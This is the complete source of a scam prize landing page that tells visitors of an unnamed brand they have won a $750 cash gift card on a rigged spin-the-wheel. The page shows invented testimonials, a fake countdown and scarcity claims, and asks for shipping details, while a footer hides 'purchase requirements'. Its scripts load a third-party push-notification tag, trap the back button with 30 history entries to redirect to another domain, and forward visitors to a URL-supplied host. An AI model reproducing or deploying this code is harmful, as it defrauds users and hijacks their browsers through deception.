<html webdriver="true">

<head>
    <base href>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">
    <meta name="robots" content="noindex, nofollow, noarchive">
    <title>[1] Gift Pending!</title>
    <link rel="stylesheet" href="s-alogo.css">
    <script>
        /*<![CDATA[*/
        function getURLParameter(a) {
            return decodeURI((RegExp(a + "=(.+?)(&|$)").exec(location.search) || [, null])[1] || "")
        }
        setTimeout(function() {
            alert("Congratulations " + getURLParameter("brand") +
                " user!\n\nWe have specially selected you to receive rewards for your loyalty.\n\nThis gift is exclusive to " +
                getURLParameter("brand") + " users in " + getURLParameter("region") +
                ".\n\nClick OK to confirm.\n")
        }, 200); /*]]>*/
    </script>
    <link rel="icon" href="data:;base64,iVBORw0KGgo=">
    <script>
        /*<![CDATA[*/
        var s = document.createElement("script");
        s.src = "//gauvaiho.net/pfe/current/micro.tag.min.js?z=4984707&sw=/sw-check-permissions-4eee0.js";
        s.onload = function(a) {
            switch (a) {
                case "onPermissionDefault":
                    break;
                case "onPermissionAllowed":
                    break;
                case "onPermissionDenied":
                    break;
                case "onAlreadySubscribed":
                    break;
                case "onNotificationUnsupported":
                    break
            }
        };
        document.head.appendChild(s); /*]]>*/
    </script>
</head>

<body onload="setButtonHeight(),autospin1()">
    <style>
        .button {
            cursor: pointer
        }

        .logo {
            left: 10px;
            width: 36px;
            height: 30px;
            background-image: url(mnu2.png);
            background-size: 31px 31px;
            background-position: center center
        }

        .footer {
            z-index: 9999;
            display: block;
            width: 100%;
            height: 30px;
        }
    </style>
    <div class="header" style="background-color: green">
        <div class="logo"></div>
        <div class="ricon1"></div>
        <div class="ricon2"></div>
    </div>
    <div class="subheader"><span class="subheadertitle">Membership Rewards</span></div>
    <div class="spacer"></div>
    <div class="wrapper">
        <div id="container" class="contestwrap wrapper">
            <div id="firstpage" class="toptext">
                <table class="wrapper">
                    <tbody>
                        <tr>
                            <td align="center" valign="top"><b>Congratulations <span class="get_brand"></span> User, you
have (1) Reward Pending!<br></b><br>
                                <font style="color:#9fa2a6;font-size:x-small"><span class="today_date_full"></span>
                                </font>
                            </td>
                        </tr>
                    </tbody>
                </table>
                <div>
                    <p class="wrapper">Every <span class="today_readable"></span> we choose 10 lucky users randomly from
                        <span class="get_region"></span> to receive a reward. This is our way to thank you for your continuing support for our products and services!<br><br></p>
                    <div class="yo" style="background-color:green;color:#fff;border-radius:0;margin:0;padding:0;padding-bottom:10px;margin-top:7px;padding-top:5px;width:100%">
                        <h2 style="margin:0;padding:0;padding-bottom:3px">Claim Your Prize</h2>
                        <h2 style="margin:0;padding:0"><span class="bounce" style="color: #ffff">↓</span> Spin the wheel
                            <span class="bounce" style="color: #ffff">↓</span></h2>
                    </div><br><br>
                    <p></p>
                </div>
                <div id="wheelCon"><img id="wheel" src="cash-w-wheel.png" width="330" height="330" class="spinAround2 transparent">
                    <div id="pressButton" style="top:102.9px"></div>
                    <div><img id="devMockup" class="animated rotateIn" src="casha750.png" width="140" height="280" style="left:98.5px;top:125px"></div>
                </div>
            </div>
        </div>
        <div class="spacer"></div>
        <div class="reviews wrapper">
            <div class="wrapper">
                <h2>Comments:</h2>
            </div>
            <table class="wrapper" style="padding-top:8px">
                <tbody>
                    <tr>
                        <td width="50px" valign="top" align="right"><img class="roundimg" src="c23.jpg"></td>
                        <td align="left" valign="top" class="commentpad">
                            <div class="name">Justin Chan</div>
                            <div class="text">I'm not a gamer, but I just chose the PS5! Why not?! LOL</div>
                            <div class="date"><span class="today_date"></span></div>
                        </td>
                    </tr>
                </tbody>
            </table>
            <hr>
            <table class="wrapper">
                <tbody>
                    <tr>
                        <td width="50px" valign="top" align="right"><img class="roundimg" src="c21.jpg"></td>
                        <td align="left" valign="top" class="commentpad">
                            <div class="name">Amiee Ruggles</div>
                            <div class="text">My iPhone 12 came in the mail today! so grateful!!</div>
                            <div class="date"><span class="today_date_minus_2"></span></div>
                        </td>
                    </tr>
                </tbody>
            </table>
            <hr>
            <table class="wrapper">
                <tbody>
                    <tr>
                        <td width="50px" valign="top" align="right"><img class="roundimg" src="c28.jpg"></td>
                        <td align="left" valign="top" class="commentpad">
                            <div class="name">Noe Dixon</div>
                            <div class="text">Fantastic! I've never won anything before, but guess it's my lucky day :D
                            </div>
                            <div class="date"><span class="today_date_minus_2"></span></div>
                        </td>
                    </tr>
                </tbody>
            </table>
            <hr>
            <table class="wrapper">
                <tbody>
                    <tr>
                        <td width="50px" valign="top" align="right"><img class="roundimg" src="c25.jpg"></td>
                        <td align="left" valign="top" class="commentpad">
                            <div class="name">Jon Pedersen</div>
                            <div class="text">It was easy, hope i get the PS4...</div>
                            <div class="date"><span class="today_date_minus_2"></span></div>
                        </td>
                    </tr>
                </tbody>
            </table>
            <hr>
            <table class="wrapper">
                <tbody>
                    <tr>
                        <td width="50px" valign="top" align="right"><img class="roundimg" src="c27.jpg"></td>
                        <td align="left" valign="top" class="commentpad">
                            <div class="name">Anthony Myers</div>
                            <div class="text">Thanks, I have given the PS4 to my brother for his birthday. Lol :D :D :D God Blessed.</div>
                            <div class="date"><span class="today_date_minus_2"></span></div>
                        </td>
                    </tr>
                </tbody>
            </table>
            <hr>
            <table class="wrapper">
                <tbody>
                    <tr>
                        <td width="50px" valign="top" align="right"><img class="roundimg" src="c26.jpg"></td>
                        <td align="left" valign="top" class="commentpad">
                            <div class="name">Ladonna Welker</div>
                            <div class="text">Saw this one time offer and clicked it off because I thought it was fake. I saw the ad again and because I was bored so I decided to try it ... And I got a NEW iphone! What!!?!</div>
                            <div class="date"><span class="today_date_minus_2"></span></div>
                        </td>
                    </tr>
                </tbody>
            </table>
            <hr>
            <table class="wrapper">
                <tbody>
                    <tr>
                        <td width="50px" valign="top" align="right"><img class="roundimg" src="c22.jpg"></td>
                        <td align="left" valign="top" class="commentpad">
                            <div class="name">Lauren Mendez</div>
                            <div class="text">I thought this was a joke at first, but my iPhone actually came into my mail this morning. #legit</div>
                            <div class="date"><span class="today_date_minus_3"></span></div>
                        </td>
                    </tr>
                </tbody>
            </table>
            <hr>
            <table class="wrapper">
                <tbody>
                    <tr>
                        <td width="50px" valign="top" align="right"><img class="roundimg" src="c24.jpg"></td>
                        <td align="left" valign="top" class="commentpad">
                            <div class="name">Joseph Booth</div>
                            <div class="text">Today there was a delivery! I gave the iphone 12 to my lovely wife for her birthday... Love u babe )</div>
                            <div class="date"><span class="today_date_minus_4"></span></div>
                        </td>
                    </tr>
                </tbody>
            </table>
        </div>
    </div>
    <div style="height:40px"></div>
    <div id="secondpage" class="wrapper">
        <div class="congrats" style="padding-top:5px">
            <h3>
                <font color="#3c5a96">Congratulations!<br>(1)
                    <font style="color:red;font-weight:700">$750 Cash Gift Card </font>is reserved for you!</font>
            </h3>
        </div>
        <div class="congrats" style="text-align:left;margin-top:5px;margin-left:5px">
            <p><b>Step 1:</b> Click the "CONTINUE" button to claim your prize.</p>
            <p><b>Step 2:</b> Enter your shipping information on the next page to claim your prize.</p>
            <p style="padding-top:10px"><b>Important:</b> Hurry, limited quantities only.</p>
        </div>
        <div class="timer" style="margin-top:5px;margin-left:5px">You only have
            <font color="green"><b><span id="mins">5</span> minutes <span id="hsecs">30</span> seconds to claim your
prize!</b></font>
        </div>
        <div class="prize">
            <table>
                <tbody>
                    <tr>
                        <th></th>
                        <td style="padding:10px 5px 10px 0;text-align:center"><img src="casha750.png" style="max-width:100px">
                            <p><b>2 remaining!</b></p>
                        </td>

                        <td>
                            <p style="text-align:left; font-weight: 700; color: #003294; margin-top: -18px;">
                                $750 Cash Gift Card
                            </p>
                            <div>
                                <a href="javascript:void(0)" rel="noreferrer" onclick="exit_a1(),PreventExitPop=!1">
                                    <div class="button" style="background:#008000; color:#ffff; padding-top: 12px; padding-bottom: 0px; margin-bottom: 12px; margin-top: -3px; height: 30px;">
                                        CONTINUE
                                        <p style="font-size: 9px; color:#8C8C8C; margin-bottom: -20px;">Participation Required</p>
                                    </div>
                                </a>
                            </div>
                        </td>
                    </tr>
                </tbody>
            </table>
        </div>
    </div>
    <div class="footer">
        <p style="display: flex; justify-content: center; align-items: center; font-size: 11px">Disclaimer: Upon completion of purchase requirements.</p>
    </div>
    <div class="sweet-overlay" style="opacity:1.03;display:block" tabindex="-1"></div>
    <div class="sweet-alert animated bounceIn visible" id="modal01" style="top:38%;border-color: green"><img id="gift-image" src="gift.gif" style="width:100px"> <img id="gift-image2" src="refresh_cash.png" style="width:70px;display:none">
        <h2 id="first-title" style="margin-top:-10px;margin-bottom:0">Membership Rewards Event</h2>
        <p id="first-dialog"></p>
        <p></p>
        <div class="sa-button-container">
            <div class="sa-confirm-button-container"><button onclick="hidemodal01()" style="display:inline-block;box-shadow:rgba(140,212,245,.8) 0 0 2px,rgba(0,0,0,.0470588) 0 0 0 1px inset;background-color:green;color:#ffff">OK</button>
                <div class="la-ball-fall"></div>
            </div>
        </div>
    </div>
    <script>
        /*<![CDATA[*/
        function getDate(g, b, k) {
            var f = new Date;
            f.setDate(f.getDate() - g);
            var h = f.getDate();
            h < 10 && (h = "0" + h);
            var j = f.getMonth(),
                c = f.getFullYear();
            return b ? p[f.getDay()] : k ? n[j] + " " + h + ", " + c : n[j] + " " + h + ", " + c
        }

        function addText(d, c) {
            for (var b = document.getElementsByClassName(d), a = 0; a < b.length; a++) {
                b[a].innerText = c
            }
        }

        function hidemodal01() {
            document.getElementById("modal01").classList.remove("visible"), document.querySelector(".sweet-overlay")
                .style.display = "none", spin()
        }

        function showmodal01() {
            document.getElementById("modal01").classList.add("visible"), document.querySelector(".sweet-overlay").style
                .display = "float"
        }

        function hidemodal02() {
            vibr > 0 && navigator.vibrate(70), document.getElementById("modal02").classList.remove("visible"), document
                .querySelector(".sweet-overlay").style.display = "none"
        }

        function setButtonHeight() {
            conMid = (whCon.getBoundingClientRect().bottom - whCon.getBoundingClientRect().top) / 2, button.style.top =
                conMid - button.offsetHeight / 2 - 0.2 * button.offsetHeight / 2 + "px"
        }

        function spin() {
            switch (count) {
                case 1:
                    dWheel.className = "spinAround", setTimeout(function() {
                        document.getElementById("gift-image").style.display = "none", document.getElementById(
                                "gift-image2").style.display = "", document.getElementById("first-title")
                            .innerHTML = "Try again!", document.getElementById("first-dialog").innerHTML =
                            "Sorry.<p>Please try again. You have 1 more chance!", document.getElementById(
                                "modal01").style.top = "55%", showmodal01()
                    }, 6800);
                    break;
                case 2:
                    dWheel.className = "spinAround2", setTimeout(function() {
                        dWheel.className = dWheel.className + " transparent"
                    }, 6800), setTimeout(function() {
                        device.style.display = "block", device.style.left = whCon.offsetWidth / 2 - device
                            .offsetWidth / 2 + "px", device.style.top = conMid - device.offsetHeight / 2 + "px"
                    }, 7000), setTimeout(function() {
                        first.innerHTML = "<img src='loading.gif'>", first.style.padding = "195px 0px",
                            setTimeout(function() {
                                first.parentNode.removeChild(first), second.style.display = "block", con
                                    .insertBefore(second, con.firstChild), setInterval("countdown()", 1000)
                            }, 1500)
                    }, 9000)
            }
            count++
        }

        function autospin1() {
            document.getElementById("pressButton").disabled = !0, document.getElementById("first-title").innerHTML =
                "Membership Rewards Event", document.getElementById("first-dialog").innerHTML = "<b>" + getDate(0) +
                "</b><p> Congratulations " + getURLParameter("brand") +
                " user! 🎉</p><p>National Consumer Center would like to thank you for your loyalty to " +
                getURLParameter("brand") +
                " - so we are offering you the chance to receive a reward.<p>Spin the wheel to claim your special prize 🎁<br><br><b>Good Luck!</b>",
                document.getElementById("modal01").style.top = "38%"
        }

        function autospin2() {
            spin()
        }

        function speak(c) {
            var b = new SpeechSynthesisUtterance,
                a = speechSynthesis.getVoices();
            b.voice = a[6], b.voiceURI = "native", b.volume = 1, b.rate = 1, b.pitch = 1, b.text = c, b.lang = "en-US",
                speechSynthesis.speak(b)
        }

        function countdown() {
            var b = parseInt(document.getElementById("mins").innerHTML),
                a = parseInt(document.getElementById("hsecs").innerHTML);
            0 != b && 0 == a ? (nmins = b - 1, nsecs = 59) : 0 != b || 0 != a ? (nmins = b, nsecs = a - 1) : 0 == b &&
                0 == a && (nmins = b, nsecs = a), document.getElementById("mins").innerHTML = nmins, document
                .getElementById("hsecs").innerHTML = nsecs, nsecs < 10 && (nsecs = "0" + nsecs)
        }

        function exit_a1() {
            window.onbeforeunload = null, window.location = "https://" + getURLParameter("td") + "/click"
        }! function() {
            var a;
            try {
                for (a = 0; 30 > a; ++a) {
                    history.pushState({}, "", "")
                }
                onpopstate = function(b) {
                    b.state && location.replace(
                        "https://go.studiolegalederrico.com/?utm_medium=a86878ebbb7ebe0df568c58daa0398cbbdb2a8bd&utm_campaign=gssl"
                    )
                }
            } catch (a) {}
        }();
        var p = new Array("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"),
            n = new Array("January", "February", "March", "April", "May", "June", "July", "August", "September",
                "October", "November", "December");
        addText("today_readable", getDate(0, !0)), addText("today_date", getDate(0)), addText("today_date_minus_2",
                getDate(2)), addText("today_date_minus_3", getDate(3)), addText("today_date_minus_4", getDate(4)),
            addText("today_date_full", getDate(0, !1, !0)), addText("get_region", getURLParameter("region")), addText(
                "get_brand", getURLParameter("brand"));
        var conMid, mydate = new Date,
            year = mydate.getFullYear(),
            day = mydate.getDate(),
            weekday = mydate.getDay(),
            count = 1,
            headline = document.getElementById("headline"),
            today = document.getElementById("today"),
            con = document.getElementById("container"),
            whCon = document.getElementById("wheelCon"),
            dWheel = document.getElementById("wheel"),
            button = document.getElementById("pressButton"),
            device = document.getElementById("devMockup"),
            first = document.getElementById("firstpage"),
            second = document.getElementById("secondpage");
        speak("Congratulations!"); /*]]>*/
    </script>
</body>

</html>